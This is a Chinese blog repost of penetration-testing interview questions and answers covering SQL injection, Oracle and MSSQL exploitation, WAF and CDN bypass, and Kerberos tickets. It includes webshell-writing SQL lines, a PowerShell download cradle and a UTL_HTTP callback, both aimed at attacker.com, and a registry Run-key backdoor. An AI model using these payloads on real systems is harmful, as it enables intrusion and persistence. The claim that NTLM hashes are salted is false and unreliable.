2025年渗透测试面试题总结-某奇安信-Ateam(题目+回答)

news2025/3/31 18:07:23

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

奇安信-Ateam

一、SQL注入攻防技术体系

1.1 SQL注入类型矩阵(基于利用方式)

1.1.1 典型利用方式

1.2 SQL写马技术路径

1.2.1 数据库特性写文件

1.2.2 Web服务漏洞结合

二、数据库高级利用技术

2.1 Oracle注入扩展利用

2.1.1 典型攻击场景

2.2 SQL Server获取Shell方法

2.2.1 现代攻击技术

三、协议与策略绕过技术

3.1 同源策略绕过方式

3.1.1 高级绕过技术

四、渗透测试全流程解析

4.1 完整渗透流程框架

4.1.1 后渗透关键操作

五、WAF绕过技术进阶

5.1 语义检测绕过矩阵

5.1.1 现代绕过技术

六、预编译场景注入可能性

6.1 预编译失效场景分析

6.1.1 安全解决方案

七、并发模型技术对比

7.1 多线程 vs 协程

八、Kerberos票据攻防

8.1 黄金票据与白银票据对比

8.1.1 检测防御方案

九、Windows认证协议演进

9.1 LM Hash与NTLM Hash对比

十、CDN绕过技术全景

10.1 CDN绕过方法矩阵

10.1.1 高级技术补充

奇安信-Ateam

sql注入基于利用方式而言有哪些类型?
sql注入写马有哪些方式
oracle注入除了注入数据之外有哪些直接利用的方式?sqlserver获取shell的方式?
同源策略的绕过方式
完整渗透测试流程思路(拿shell到后渗透流程)
如何绕过基于语义检测的waf,比如雷池,阿里云等
预编译场景下是否存在sql注入(如果存在可控数据呢?)
多线程和协程的区别
黄金票据和白银票据的区别
php中LM hash和NTLM hash的区别
CDN的绕过方式

一、SQL注入攻防技术体系

1.1 SQL注入类型矩阵(基于利用方式)

mermaidgraph TD A[SQL注入类型] --> B(联合查询注入) A --> C(报错注入) A --> D(布尔盲注) A --> E(时间盲注) A --> F(堆叠注入) A --> G(二阶注入) B --> B1(通过UNION扩展结果集) C --> C1(利用数据库报错函数) D --> D1(基于布尔逻辑判断) E --> E1(利用延时函数探测) F --> F1(多语句执行) G --> G1(存储过程二次触发)
1.1.1 典型利用方式
  • 联合查询注入
    sql' UNION SELECT username,password FROM users-- 
  • 报错注入(MySQL示例):
    sqlAND updatexml(1,concat(0x7e,version()),1)
  • 时间盲注(Oracle示例):
    sqlCASE WHEN ASCII(SUBSTR((SELECT user FROM dual),1,1))=83 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',5) END 

1.2 SQL写马技术路径

1.2.1 数据库特性写文件
数据库类型写文件方法前提条件
MySQLSELECT '<?php eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/shell.php'secure_file_priv为空
SQL ServerEXEC xp_cmdshell 'echo ^<?php eval($_POST[cmd]);?^> > C:\inetpub\shell.php'开启xp_cmdshell组件
OracleUTL_FILE.PUT_LINE('/webroot','shell.jsp','<% Runtime.getRuntime().exec(request.getParameter("cmd")) %>')DBA权限且目录权限开放
1.2.2 Web服务漏洞结合
  • 通过LOAD_FILE()读取Web路径配置
  • 利用文件上传漏洞写入Web目录
  • 注入点配合Web框架模板渲染漏洞

二、数据库高级利用技术

2.1 Oracle注入扩展利用

mermaidgraph LR A[Oracle注入利用] --> B(执行系统命令) A --> C(文件读写) A --> D(权限提升) A --> E(网络探测) B --> B1(Java存储过程调用) C --> C1(UTL_FILE包操作) D --> D1(利用DBMS_JOB提权) E --> E1(UTL_HTTP发起请求)
2.1.1 典型攻击场景
  • 命令执行
    sqlCREATE OR REPLACE JAVA SOURCE NAMED "Exec" AS import java.lang.*;... 
  • SMB Relay攻击
    sqlUTL_HTTP.REQUEST('http://attacker.com/' ||SYS_CONTEXT('USERENV','OS_USER'))

2.2 SQL Server获取Shell方法

mermaidgraph TB A[Shell获取方式] --> B(启用xp_cmdshell) A --> C(OLE自动化) A --> D(CLR集成) B --> B1(EXEC sp_configure 'xp_cmdshell',1) C --> C1(使用sp_OACreate执行命令) D --> D1(加载.NET程序集)
2.2.1 现代攻击技术
  • PowerShell注入
    sqlEXEC xp_cmdshell 'powershell -c "IEX (New-Object Net.WebClient).DownloadString(''http://attacker.com/shell.ps1'')"' 
  • 注册表持久化
    sqlEXEC xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','backdoor','REG_SZ','C:\shell.exe' 

三、协议与策略绕过技术

3.1 同源策略绕过方式

mermaidgraph LR A[同源策略绕过] --> B(CORS配置错误) A --> C(JSONP劫持) A --> D(postMessage滥用) B --> B1(Access-Control-Allow-Origin: *) C --> C1(未校验回调函数名) D --> D1(跨窗口消息监听)
3.1.1 高级绕过技术
  • DNS Rebinding攻击:利用TTL过期重新绑定IP
  • WebSocket协议滥用:建立跨域双向通信通道
  • Service Worker劫持:通过注册恶意worker缓存敏感数据

四、渗透测试全流程解析

4.1 完整渗透流程框架

mermaidgraph TD A[信息收集] --> B(漏洞扫描) B --> C(漏洞利用) C --> D(权限维持) D --> E(横向移动) E --> F(数据窃取) F --> G(痕迹清除) A --> A1(域名/IP资产发现) A1 --> A2(端口服务扫描) B --> B1(SQL注入/XSS检测) C --> C1(Metasploit利用) D --> D1(后门/Webshell部署) E --> E1(Pass-the-Hash攻击)
4.1.1 后渗透关键操作
  • 黄金票据攻击:伪造TGT票据实现域控持久化
  • LSASS内存提取:使用Mimikatz获取明文凭证
  • WMI事件订阅:创建永久后门

五、WAF绕过技术进阶

5.1 语义检测绕过矩阵

绕过类型技术实现典型案例
注释分割SEL/**/ECT绕过关键字检测
十六进制编码0x732F6C6F67696E → 's/login'混淆敏感字符串
数据库特性利用MySQL的/*!50000SELECT*/版本特异性语法
协议级混淆HTTP分块传输编码绕过内容长度检测
逻辑绕过WHERE 1=1 AND (SELECT ...)构造复杂条件表达式
5.1.1 现代绕过技术
  • Unicode规范化攻击:利用字符编码差异
    sql%u0053%u0045%u004c%u0045%u0043%u0054 → SELECT 
  • JSON格式注入
    httpPOST /api HTTP/1.1 {"query":"admin' AND 1=CONVERT(int,@@version)--"}

六、预编译场景注入可能性

6.1 预编译失效场景分析

mermaidgraph LR A[预编译失效点] --> B(动态表名) A --> C(排序参数) A --> D(批量插入) A --> E(IN语句参数) B --> B1(String query = "SELECT * FROM "+tableName) C --> C1("ORDER BY "+sortField) D --> D1("INSERT INTO t VALUES (?,?), (?,?)") E --> E1("WHERE id IN ("+params+")")
6.1.1 安全解决方案
  • 白名单校验:对表名/列名进行严格过滤
  • 参数化拼接:使用框架提供的安全方法
    python# SQLAlchemy示例 stmt = text("SELECT * FROM table WHERE id=:id").bindparams(id=value)

七、并发模型技术对比

7.1 多线程 vs 协程

维度多线程协程
调度机制操作系统内核调度用户态协作式调度
上下文切换成本高(涉及内核模式切换)低(仅寄存器保存)
内存占用每个线程约1MB栈内存通常小于10KB
并发处理能力千级并发百万级并发
适用场景CPU密集型任务I/O密集型任务

八、Kerberos票据攻防

8.1 黄金票据与白银票据对比

mermaidgraph LR A[黄金票据] --> B(需要krbtgt哈希) A --> C(生成任意服务TGT) A --> D(权限最大) E[白银票据] --> F(需要服务哈希) E --> G(生成特定服务ST) E --> H(隐蔽性更强)
8.1.1 检测防御方案
  • 票据有效期检测:黄金票据有效期通常设置为10年
  • SPN变更监控:白银票据依赖特定服务主体名称
  • AES256加密强制:防止RC4-HMAC降级攻击

九、Windows认证协议演进

9.1 LM Hash与NTLM Hash对比

特征LM HashNTLM Hash
加密算法DESMD4
密码处理分割为两个7字符块完整Unicode编码
抗彩虹表能力弱(已被广泛破解)较强(使用salt)
现代系统支持Vista后默认禁用仍广泛使用
存储格式AAD3B435B51404EEAAD3B435B51404EE32位十六进制字符串

十、CDN绕过技术全景

10.1 CDN绕过方法矩阵

mermaidgraph TD A[CDN绕过] --> B(子域名探测) A --> C(历史DNS查询) A --> D(邮件服务器IP) A --> E(国外访问) B --> B1(www.test.com 使用CDN但api.test.com 未使用) C --> C1(SecurityTrails查询历史A记录) D --> D1(MX记录解析获取真实IP) E --> E1(目标仅部署国内CDN节点)
10.1.1 高级技术补充
  • SSL证书关联:通过证书颁发者信息关联真实IP
  • HTTP头差异:对比CDN节点与源站Server头
  • CloudFlare特定绕过
    bash# 使用CloudFlair工具 cloudflair -d target.com -c /path/to/certificate.pem 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2323556.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Windows 10 ARM64平台MFC串口程序开发

Windows 10 IoT ARM64平台除了支持新的UWP框架&#xff0c;也兼容支持老框架MFC。使得用户在Windows 10 IoT下可以对原MFC工程进行功能升级&#xff0c;不用在新框架下重写整个工程。熟悉MFC开发的工程师也可以在Windows 10 IoT平台下继续使用MFC进行开发。 本文展示MFC串口程序…

31天Python入门——第16天:模块与库详解

你好&#xff0c;我是安然无虞。 文章目录 Python模块模块之间的调用 Python包库的概念Python标准库安装第三方库 \_\_name\_\_ \_\_main\_\_ Python模块 在 Python 中, 模块是一个包含函数、变量和类等代码定义的py文件. 所以也可以说, 普通的py文件就是一个模块. 模块可以…

设计模式(创建型)- 原型模式

目录 定义 类图 角色 优缺点 优点 缺点 应用场景 案例展示 浅克隆 深克隆 定义 原型模式旨在创建重复的对象&#xff0c;同时确保良好的性能表现。它通过复制现有对象&#xff08;原型&#xff09;来创建新对象&#xff0c;而非使用传统的构造函数创建方式。这种设计…

【Linux】应用层协议 HTTP

应用层协议 HTTP 一. HTTP 协议1. URL 地址2. urlencode 和 urldecode3. 请求与响应格式 二. HTTP 请求方法1. GET 和 POST (重点) 三. HTTP 状态码四. HTTP 常见报头五. 手写 HTTP 服务器 HTTP&#xff08;超文本传输协议&#xff09;是一种应用层协议&#xff0c;用于在万维网…

数据可视化TensorboardX和tensorBoard安装及使用

tensorBoard 和TensorboardX 安装及使用指南 tensorBoard 和 TensorBoardX 是用于可视化机器学习实验和模型训练过程的工具。TensorBoard 是 TensorFlow 官方提供的可视化工具&#xff0c;而 TensorBoardX 是其社区驱动的替代品&#xff0c;支持 PyTorch 等其他框架。以下是它…

【Hugging Face 开源库】Diffusers 库 —— 扩散模型

Diffusers 的三个主要组件1. DiffusionPipeline&#xff1a;端到端推理工具__call__ 函数callback_on_step_end 管道回调函数 2. 预训练模型架构和模块UNetVAE&#xff08;Variational AutoEncoder&#xff09;图像尺寸与 UNet 和 VAE 的关系EMA&#xff08;Exponential Moving…

AWTK-WEB 快速入门(6) - JS WebSocket 应用程序

WebSocket 可以实现双向通信&#xff0c;适合实时通信场景。本文介绍一下使用 Javacript 语言开发 AWTK-WEB 应用程序&#xff0c;并用 WebSocket 与服务器通讯。 用 AWTK Designer 新建一个应用程序 先安装 AWTK Designer&#xff1a; https://awtk.zlg.cn/web/index.html …

使用VSCODE导致CPU占用率过高的处理方法

1&#xff1a;cpptools 原因&#xff1a;原因是C/C会在全局搜索文件&#xff0c;可以快速进行跳转&#xff1b;当打开的文件过大&#xff0c;全局搜索文件会占用大量CPU&#xff1b; 处理方法&#xff1a; 1&#xff1a;每次只打开小文件夹&#xff1b; 2&#xff1a;打开大文…

【力扣hot100题】(004)盛水最多的容器

现在能这么快做出来纯粹是因为当时做的时候给我的印象实在太深了。 犹记得这题是当年开启我用CSDN记录leetcode日记历史的开端。 总之印象太深了不会都不行啊&#xff01;&#xff01;记得当年是想到用各种动态规划回溯等等等等最终发现是最简单贪心和双指针。 解法也是非常简…

用Deepseek写扫雷uniapp小游戏

扫雷作为Windows系统自带的经典小游戏&#xff0c;承载了许多人的童年回忆。本文将详细介绍如何使用Uniapp框架从零开始实现一个完整的扫雷游戏&#xff0c;包含核心算法、交互设计和状态管理。无论你是Uniapp初学者还是有一定经验的开发者&#xff0c;都能从本文中获得启发。 …

Eclipse IDE for ModusToolbox™ 3.4环境通过JLINK调试CYT4BB

使用JLINK在Eclipse IDE for ModusToolbox™ 3.4环境下调试CYT4BB&#xff0c;配置是难点。总结一下在IDE中配置JLINK调试中遇到的坑&#xff0c;以及如何一步一步解决遇到的问题。 1. JFLASH能够正常下载程序 首先要保证通过JFLASH(我使用的J-Flash V7.88c版本)能够通过JLIN…

修改git在提交代码时的名称

在git中&#xff0c;如果想修改提交代码作者的名字&#xff0c;可以进行以下操作&#xff1a; 1.在桌面或者文件夹内右击鼠标&#xff0c;点开Git Bash here。 2.进入后&#xff0c;通过git config user.name 回车查看当前名称。 3.通过git config --global user.name "…

【Linux】深入解析Linux命名管道(FIFO):原理、实现与实战应用

本文承接上文匿名管道&#xff1a;【Linux】深度解析Linux进程间通信&#xff1a;匿名管道原理、实战与高频问题排查-CSDN博客 深入探讨Linux进程间通信&#xff08;IPC&#xff09;&#xff0c;以匿名管道为核心&#xff0c;详细阐述其通信目的、实现前提及机制。涵盖数据传输…

第十四届蓝桥杯省赛电子类单片机学习记录(客观题)

01.一个8位的DAC转换器&#xff0c;供电电压为3.3V&#xff0c;参考电压2.4V&#xff0c;其ILSB产生的输出电压增量是&#xff08;D&#xff09;V。 A. 0.0129 B. 0.0047 C. 0.0064 D. 0.0094 解析&#xff1a; ILSB&#xff08;最低有效位&#xff09;的电压增量计算公式…

vim的一般操作(分屏操作) 和 Makefile 和 gdb

目录 一. vim的基本概念 二. vim基础操作 2.1 插入模式 aio 2.2 [插入模式]切换至[正常模式] Esc 2.3[正常模式]切换至[末行模式] shift ; 2.4 替换模式 Shift R 2.5 视图&#xff08;可视&#xff09;模式 (可以快速 删除//注释 或者 增加//注释) ctrl v 三&…

Apache Shiro 统一化实现多端登录(PC端移动端)

Apache Shiro 是一个强大且易用的Java安全框架&#xff0c;提供了身份验证、授权、密码学和会话管理等功能。它被广泛用于保护各种类型的应用程序&#xff0c;包括Web应用、桌面应用、RESTful服务、移动端应用和大型企业级应用。 需求背景 在当今数字化浪潮的推动下&#xff…

NAT—地址转换(实战篇)

一、实验拓扑&#xff1a; 二、实验需求&#xff1a; 1.实现内网主机访问外网 2.实现外网客户端能够访问内网服务器 三、实验思路 1.配置NAT地址池实现内网地址转换成公网地址&#xff0c;实现内网主机能够访问外网。 2.配置NAT Sever实现公网地址映射内网服务器地址&…

用HTML和CSS生成炫光动画卡片

这个效果结合了渐变、旋转和悬浮效果的炫酷动画示例&#xff0c;使用HTML和CSS实现。 一、效果 二、实现 代码如下&#xff1a; <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport&quo…

FPGA_YOLO(三)

上一篇讲的是完全映射&#xff0c;也就是block中的所包含的所有的卷积以及归一&#xff0c;池化卷积 举例总共6个等都在pl侧进行处理&#xff08;写一个top 顶层 里面conv 1 bn1 relu1 pool1 conv1*1 conv 2 bn2 relu2 pool2 conv1*1 ....总共6个 &#xff09;&#xff0c;…

旅游CMS选型:WordPress、Joomla与Drupal对比

内容概要 在旅游行业数字化转型进程中&#xff0c;内容管理系统&#xff08;CMS&#xff09;的选择直接影响网站运营效率与用户体验。WordPress、Joomla和Drupal作为全球主流的开源CMS平台&#xff0c;其功能特性与行业适配性存在显著差异。本文将从旅游企业核心需求出发&…